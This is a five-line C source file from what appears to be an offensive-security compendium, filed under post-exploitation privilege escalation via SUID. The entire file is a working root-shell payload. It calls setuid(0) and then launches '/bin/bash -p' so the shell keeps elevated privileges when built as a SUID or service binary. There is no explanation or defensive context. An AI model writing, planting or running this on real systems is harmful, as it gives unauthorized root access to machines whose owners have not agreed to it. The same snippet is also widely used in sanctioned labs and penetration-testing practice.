killchain-compendium/post exploitation/priv_esc/suid/service.c

5 lines
52 B
C

int main() {
setuid(0);
system("/bin/bash -p");
}